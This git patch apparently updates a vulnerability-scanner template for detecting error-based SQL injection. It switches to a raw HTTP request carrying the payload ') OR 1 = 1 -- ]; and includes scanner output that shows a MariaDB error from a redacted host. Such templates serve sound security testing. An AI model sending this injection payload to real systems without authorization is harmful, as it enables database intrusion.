From a3d704752174d47b124f5e35a0a764d9c1f02e1b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 20 Mar 2021 19:52:48 +0000 Subject: [PATCH 1/2] Update error-based-sql-injection.yaml Reverting back to raw http request. Sending encoded requests using net/http were missing blatant SQL injections. Before: [INF] Loading templates... [INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high] [INF] Loading workflows... [INF] Using 1 rules (1 templates, 0 workflows) [INF] No results found. Better luck next time! After: [INF] Loading templates... [INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high] [INF] Loading workflows... [INF] Using 1 rules (1 templates, 0 workflows) [2021-03-20 14:48:59] [error-based-sql-injection:MariaDB] [http] [high] https://REDACTED/') [check the manual that corresponds to your MariaDB server version] --- .../generic/error-based-sql-injection.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml index c29169c4fc..3ac783f22c 100644 --- a/vulnerabilities/generic/error-based-sql-injection.yaml +++ b/vulnerabilities/generic/error-based-sql-injection.yaml @@ -8,12 +8,13 @@ info: tags: sqli requests: - - method: GET - path: - - "{{BaseURL}}/') OR 1 = 1 -- ];" - - # Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request - # In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request + - raw: + - |+ + GET /') OR 1 = 1 -- ]; + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: */* + Connection: close matchers-condition: and matchers: From 8fd55de534859d6784f6cd577bc11f892b4dba82 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 21 Mar 2021 20:28:22 +0530 Subject: [PATCH 2/2] Update error-based-sql-injection.yaml --- vulnerabilities/generic/error-based-sql-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml index 3ac783f22c..7d5bcdd562 100644 --- a/vulnerabilities/generic/error-based-sql-injection.yaml +++ b/vulnerabilities/generic/error-based-sql-injection.yaml @@ -9,7 +9,7 @@ info: requests: - raw: - - |+ + - | GET /') OR 1 = 1 -- ]; Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0